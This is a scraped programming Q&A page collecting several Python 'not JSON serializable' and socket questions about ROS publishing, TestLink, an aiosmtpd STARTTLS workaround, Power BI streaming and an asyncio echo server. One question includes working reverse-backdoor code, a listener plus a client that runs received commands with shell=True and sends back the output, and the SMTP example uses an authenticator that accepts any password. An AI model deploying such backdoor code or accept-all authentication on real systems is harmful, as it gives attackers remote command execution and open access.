Object of type ndarray is not JSON serializable - json

I am getting data using a TCP and trying it to publish it in std_msgs/Float64MultiArray format, however when I am trying to convert the json data to numpy array I am getting the following error
File "/usr/lib/python3.8/json/encoder.py", line 179, in default
raise TypeError(f'Object of type {o.__class__.__name__} '
TypeError: Object of type Int32MultiArray is not JSON serializable
Code for receiving data from tcp and sending it to rosbridge (topic chatter)
import roslibpy
import socket
import time
import struct
import numpy as np
import json
from rospy.numpy_msg import numpy_msg
from rospy_tutorials.msg import Floats
from std_msgs.msg import String,Int32,Int32MultiArray,MultiArrayLayout,MultiArrayDimension,Float64MultiArray
# ROS Python Bridge
client = roslibpy.Ros(host='localhost', port=9090) #same as rosbridge port
client.run()
print("Is ROS connected? ",client.is_connected)
talker = roslibpy.Topic(client, '/chatter', 'std_msgs/Float64MultiArray')
data_to_send = Float64MultiArray() # the data to be sent, initialise the array
HOST = "0.0.0.0" # Standard loopback interface address (localhost)
PORT = 8081 # Port to listen on (non-privileged ports are > 1023)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
while True:
s.listen()
conn, addr = s.accept()
with conn:
print(f"Connected by {addr}")
while client.is_connected:
data = conn.recv(1024)
if not data:
break
conn.sendall(data)
data = json.loads(data)
data_list = data[0]
x_val = data_list['x']
y_val = data_list['y']
z_val = data_list['z']
pos_arry = np.unique([x_val,y_val,z_val])
pos_arry = pos_arry.tolist()
my_array_for_publishing = Int32MultiArray(data=pos_arry)
print(type(pos_arry))
talker.publish(roslibpy.Message({'data': my_array_for_publishing}))
print('Sending message...')
talker.unadvertise()
client.terminate()

This error can be resolve by sending the data in list format.
pos_arry = np.unique([x_val,y_val,z_val])
pos_arry = pos_arry.tolist()
and retrieving the using .at
example
std_msgs::Float64MultiArray val = listener.data;
std::cout << val.data.at(0)<< std::endl;

Related

Parsing JSON element (Iterate over list of elements)

I created a script where it creates a JSON file where the list of my server URLs and API keys are stored. Now, I need to get those element (URL & API keys) in order for me to get all the users on each server. I'm stuck at the point where I need to iterate on all server URLs and declare them as a variable.
Below is my sample code.
import sys
import json
import testlink
import xmlrpc.client
import requests
import xml.etree.ElementTree as ET
import openpyxl
from openpyxl import Workbook
requests.packages.urllib3.disable_warnings()
# Create a Json file that compose of TESTLINK_API_PYTHON_SERVER_URL and TESTLINK_API_PYTHON_DEVKEY
def serverJson():
serverDictionary = {
"servers": [
{
"server_name": "https://firstInstance/lib/api/xmlrpc/v1/xmlrpc.php",
"devKey": "1234567890abcdef"
},
{
"server_name": "https://secondInstance/lib/api/xmlrpc/v1/xmlrpc.php",
"devKey": "0987654321fedcba"
}
]
}
# Create json file
with open("server.json", "w") as server:
json.dump(serverDictionary, server)
# Return TESTLINK_API_PYTHON_SERVER_URL and TESTLINK_API_PYTHON_DEVKEY
def serverList():
serverJson()
# Open json file
server_file = open('server.json')
# Return JSON Object as dictionary
data = json.load(server_file)
# Iterating through the json list
for servers in data['servers']:
serverName = servers.get('server_name')
devKey = servers.get('devKey')
print(serverName, devKey)
# Start Testlink-API-Call
TESTLINK_API_PYTHON_SERVER_URL = str()
TESTLINK_API_PYTHON_DEVKEY = str()
tls = testlink.TestlinkAPIClient(TESTLINK_API_PYTHON_SERVER_URL, TESTLINK_API_PYTHON_DEVKEY)
# IF Else to each instance & devKey
# First instance
if TESTLINK_API_PYTHON_SERVER_URL == (firstServerURL) and TESTLINK_API_PYTHON_DEVKEY == (firstDevKey):
print("----------User list for First Instance----------")
tree = ET.parse('usersTLFirstInstance.xml')
root = tree.getroot()
for user in root.findall('user'):
loginID = user.find('id').text
for tl_first_user in tls.getUserByID(loginID):
first_name = tl_first_user.get('firstName')
print(loginID, first_name)
print("----------Ending List for First Instance----------")
# Second instance
elif TESTLINK_API_PYTHON_SERVER_URL == (secondServerURL) and TESTLINK_API_PYTHON_DEVKEY == (secondDevKey):
print("----------User list for Second Instance----------")
tree = ET.parse('usersTLSecondInstance.xml')
root = tree.getroot()
for user in root.findall('user'):
loginID = user.find('id').text
for tl_second_user in tls.getUserByID(loginID):
first_name = tl_second_user.get('firstName')
print(loginID, first_name)
print("----------Ending List for Second Instance----------")
serverList()
Here is my JSON File that I created.
{
"servers": [
{
"server_name": "https://firstInstance/lib/api/xmlrpc/v1/xmlrpc.php",
"devKey": "1234567890abcdef"
},
{
"server_name": "https://secondInstance/lib/api/xmlrpc/v1/xmlrpc.php",
"devKey": "0987654321fedcba"
}
]
}

SMTP STARTTLS format

Is the EHLO message required after the TLS connection has been established? I'm using an acorn ltl-6511M wildlife camera that doesn't seem to send an EHLO message after establishing the TLS connection, causing a 503 error in my aiosmtpd-based SMTP server. It works with gmail SMTP though. Is the camera following the protocol or is my server not robust enough?
The code I'm using is:
import email
from email.header import decode_header
from email import message_from_bytes
from email.policy import default
from aiosmtpd.controller import Controller
from aiosmtpd.smtp import LoginPassword, AuthResult
import os
import sys
import time
import signal
import logging
import ssl
##setting timezone
os.environ['TZ'] = "Europe/London"
time.tzset()
def onExit( sig, func=None):
print("*************Stopping program*****************")
controller.stop()
exit()
signal.signal(signal.SIGTERM, onExit)
# removes the spaces and replaces with _ so they're valid folder names
def clean(text):
return "".join(c if c.isalnum() else "_" for c in text)
log = logging.getLogger('mail.log')
auth_db = {
b"TestCamera1#gmail.com": b"password1",
b"user2": b"password2",
b"TestCamera1": b"password1",
}
def authenticator_func(server, session, envelope, mechanism, auth_data):
#this deliberately lets everything through
assert isinstance(auth_data, LoginPassword)
username = auth_data.login
password = auth_data.password
return AuthResult(success=True)
def configure_logging():
file_handler = logging.FileHandler("aiosmtpd.log", "a")
stderr_handler = logging.StreamHandler(sys.stderr)
logger = logging.getLogger("mail.log")
fmt = "[%(asctime)s %(levelname)s] %(message)s"
datefmt = None
formatter = logging.Formatter(fmt, datefmt, "%")
stderr_handler.setFormatter(formatter)
logger.addHandler(stderr_handler)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.setLevel(logging.DEBUG)
class CustomHandler:
def handle_exception(self, error):
print("exception occured")
print(error)
return '542 Internal Server Error'
async def handle_DATA(self, server, session, envelope):
peer = session.peer
data = envelope.content # type: bytes
msg = message_from_bytes(envelope.content, policy=default)
# decode the email subject
print("Msg:{}".format(msg))
print("Data:{}".format(data))
print("All of the relevant data has been extracted from the email")
return '250 OK'
if __name__ == '__main__':
configure_logging()
handler = CustomHandler()
#update hostname to your IP
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain('cert.pem', 'key.pem')
controller = Controller(handler, hostname='0.0.0.0', port=587, authenticator=authenticator_func, auth_required=True,auth_require_tls=True,tls_context=context)
# Run the event loop in a separate thread.
controller.start()
while True:
time.sleep(10)
The code after trying to integrate is:
import email
from email.header import decode_header
from email import message_from_bytes
from email.policy import default
from aiosmtpd.controller import Controller
from aiosmtpd.smtp import LoginPassword, AuthResult, SMTP
import os
import json
import re
import sys
import time
import signal
import logging
import ssl
from datetime import datetime
import configparser
##setting timezone
os.environ['TZ'] = "Europe/London"
time.tzset()
spacer = "*"*100
def onExit( sig, func=None):
print("*************Stopping program*****************",3)
controller.stop()
exit()
signal.signal(signal.SIGTERM, onExit)
# removes the spaces and replaces with _ so they're valid folder names
def clean(text):
return "".join(c if c.isalnum() else "_" for c in text)
log = logging.getLogger('mail.log')
auth_db = {
b"TestCamera1#gmail.com": b"password1",
b"user2": b"password2",
b"TestCamera1": b"password1",
}
def authenticator_func(server, session, envelope, mechanism, auth_data):
# Simple auth - is only being used because of the reolink cam
assert isinstance(auth_data, LoginPassword)
username = auth_data.login
password = auth_data.password
log.warning("Authenticator is being used")
return AuthResult(success=True)
def configure_logging():
file_handler = logging.FileHandler("aiosmtpd.log", "a")
stderr_handler = logging.StreamHandler(sys.stderr)
logger = logging.getLogger("mail.log")
fmt = "[%(asctime)s %(levelname)s] %(message)s"
datefmt = None
formatter = logging.Formatter(fmt, datefmt, "%")
stderr_handler.setFormatter(formatter)
logger.addHandler(stderr_handler)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
logger.setLevel(logging.DEBUG)
class SMTPNoEhloAfterStarttls(SMTP):
async def smtp_STARTTLS(self, arg: str):
print(spacer)
print("using starttls")
host_name = self.session.host_name
extended_smtp = self.session.extended_smtp
await super().smtp_STARTTLS(arg)
if host_name and extended_smtp and not self.session.host_name:
# There was an EHLO before the STARTTLS.
# RFC3207 says that we MUST reset the state
# and forget the EHLO, but unfortunately
# the client doesn't re-send the EHLO after STARTTLS,
# so we need to pretend as if an EHLO has been sent.
self.session.host_name = host_name
self.session.extended_smtp = True
class ControllerNoEhloAfterStarttls(Controller):
def factory(self):
print(spacer)
print("updating default settings")
return SMTPNoEhloAfterStarttls(self.handler, **self.SMTP_kwargs)
class CustomHandler:
def handle_exception(self, error):
print("exception occured",3)
print(error)
return '542 Internal Server Error'
async def handle_DATA(self, server, session, envelope):
peer = session.peer
data = envelope.content # type: bytes
msg = message_from_bytes(envelope.content, policy=default)
# decode the email subject
print("Msg:{}".format(msg),3)
print("Data:{}".format(data),3)
print("All of the relevant data has been extracted from the email",3)
print(spacer,3)
return '250 OK'
if __name__ == '__main__':
configure_logging()
handler = CustomHandler()
# controller = Controller(handler, hostname='10.200.68.132', port=587)
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
context.load_cert_chain('cert.pem', 'key.pem')
controller = Controller(handler, hostname='10.200.68.133', port=587, authenticator=authenticator_func, auth_required=True,auth_require_tls=True,tls_context=context)
# Run the event loop in a separate thread.
controller.start()
#Confirmed that this is needed to keep the SMTP server running constantly
while True:
time.sleep(10)
However, this hasn't made any difference to the error logs.
Yes, EHLO is required after STARTTLS, see RFC3207 Section 4.2 (which specifically mentions forgetting the EHLO line - emphasis mine):
Upon completion of the TLS handshake, the SMTP protocol is reset to
the initial state (the state in SMTP after a server issues a 220
service ready greeting). The server MUST discard any knowledge
obtained from the client, such as the argument to the EHLO command,
which was not obtained from the TLS negotiation itself.
This means that unfortunately your camera is not following the SMTP protocol. It is also unfortunate that GMail SMTP does not follow the protocol (it doesn't require EHLO in-between STARTTLS and AUTH LOGIN).
aiosmtpd is quite insistent on following the SMTP protocol and duly forgets the EHLO data before the STARTTLS; the EHLO hostname is stored in self.session.host_name on the aiosmtpd.smtp.SMTP object, and self.session is reset in SMTP.connection_made(), which is invoked after STARTTLS.
It is possible to make aiosmtpd break the SMTP specification and act in a highly non-conforming way. Obviously this is something you MUST NOT do in production. Use the ControllerNoEhloAfterStarttls defined below instead of the standard aiosmtpd Controller and then it should work.
from aiosmtpd.smtp import SMTP
from aiosmtpd.controller import Controller
class SMTPNoEhloAfterStarttls(SMTP):
async def smtp_STARTTLS(self, arg: str):
host_name = self.session.host_name
extended_smtp = self.session.extended_smtp
await super().smtp_STARTTLS(arg)
if host_name and extended_smtp and not self.session.host_name:
# There was an EHLO before the STARTTLS.
# RFC3207 says that we MUST reset the state
# and forget the EHLO, but unfortunately
# the client doesn't re-send the EHLO after STARTTLS,
# so we need to pretend as if an EHLO has been sent.
self.session.host_name = host_name
self.session.extended_smtp = True
class ControllerNoEhloAfterStarttls(Controller):
def factory(self):
return SMTPNoEhloAfterStarttls(self.handler, **self.SMTP_kwargs)
...and then down in if __name__ == "__main__":, instantiate the custom controller class instead of the default Controller:
controller = ControllerNoEhloAfterStarttls(handler, hostname='10.200.68.133', port=587, ......)

I get this error i get this Error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor aganist my real computer

I have python 2 on my VM and my code is as follows:
#!/usr/bin/env python
import socket, json
class Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print("[+] Waiting for incoming connection")
self.connection, address = listener.accept()
print("[+] Got a connection from " + str(address))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_remotely(self, command):
self.reliable_send(command)
return self.reliable_recieve()
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print(result)
my_listener = Listener("ip adress", 4444)
my_listener.run()
And my target computer has python 3 and the code as follows:
#!/usr/bin/env python
import socket, subprocess
import json
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True)
def run(self):
while True:
command = self.reliable_recieve()
command_result = self.execute_system_command(command)
self.reliable_send(command_result)
connection.close()
my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this I get the error mentioned in the subject. I have tried to decode the json_data with the utf-8 argument but the problem persists.
i get this screen. The listener model is working in my VM but in my real pc its show this error
enter image description here
and if i decode my json_data its show the error "Object of type bytes is not JSON serializable"

"TypeError: Object of type 'bytes' is not JSON serializable" live streaming data

I am trying to live stream data into Power Bi from python. However I am encountering the error
TypeError: Object of type 'bytes' is not JSON serializable
I have put my code below, please indicate what I am doing wrong as I don't quite understand what the issue is.
import pandas as pd
from datetime import datetime
from datetime import timedelta
import requests
import json
import time
import random
# function for data_generation
def data_generation():
surr_id = random.randint(1, 3)
speed = random.randint(20, 200)
date = datetime.today().strftime("%Y-%m-%d")
time = datetime.now().isoformat()
return [surr_id, speed, date, time]
if __name__ == '__main__':
REST_API_URL = 'api_url'
while True:
data_raw = []
for j in range(1):
row = data_generation()
data_raw.append(row)
print("Raw data - ", data_raw)
# set the header record
HEADER = ["surr_id", "speed", "date", "time"]
data_df = pd.DataFrame(data_raw, columns=HEADER)
data_json = bytes(data_df.to_json(orient='records'), encoding='utf-8')
print("JSON dataset", data_json)
# Post the data on the Power BI API
try:
req = requests.post(REST_API_URL, data=json.dumps(
data_json), headers=HEADER, timeout=5)
print("Data posted in Power BI API")
except requests.exceptions.ConnectionError as e:
req = "No response"
print(req)
time.sleep(3)
Solved, Just changed req = requests.post(REST_API_URL, data=json.dumps(data_json), headers=HEADER, timeout=5) to req = requests.post(url=REST_API_URL, data=data_json)

Python 3.6 asyncio send json message error

I'm trying to set-up a TCP echo client and server that can exchange messages using the JSON format.
I took the code from the documentation and modified it as follows:
Edit: include fix and have both server and client send JSON style messages.
import asyncio
# https://docs.python.org/3/library/asyncio-stream.html
import json
async def handle_echo(reader, writer):
data = await reader.read(100)
message = json.loads(data.decode())
addr = writer.get_extra_info('peername')
print("Received %r from %r" % (message, addr))
print("Send: %r" % json.dumps(message)) # message
json_mess_en = json.dumps(message).encode()
writer.write(json_mess_en)
#writer.write(json_mess) # not wokring
#writer.write(json.dumps(json_mess)) # not working
# Yielding from drain() gives the opportunity for the loop to schedule the write operation
# and flush the buffer. It should especially be used when a possibly large amount of data
# is written to the transport, and the coroutine does not yield-from between calls to write().
#await writer.drain()
#print("Close the client socket")
writer.close()
loop = asyncio.get_event_loop()
coro = asyncio.start_server(handle_echo, '0.0.0.0', 9090, loop=loop)
server = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
print('Serving on {}'.format(server.sockets[0].getsockname()))
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
and the client code:
import asyncio
import json
async def tcp_echo_client(message, loop):
reader, writer = await asyncio.open_connection('0.0.0.0', 9090,
loop=loop)
print('Send: %r' % message)
writer.write(json.dumps(message).encode())
data = await reader.read(100)
data_json = json.loads(data.decode())
print('Received: %r' % data_json)
print(data_json['welcome'])
print('Close the socket')
writer.close()
message = {'welcome': 'Hello World!'}
loop = asyncio.get_event_loop()
loop.run_until_complete(tcp_echo_client(message, loop))
loop.close()
Error
TypeError: data argument must be a bytes-like object, not 'str'
Should I use another function than writer.write to encode for JSON? Or any suggestions?
Found the solution, replace:
writer.write(json.dumps(json_mess))
for
# encode as 'UTF8'
json_mess_en = json.dumps(json_mess).encode()
writer.write(json_mess_en)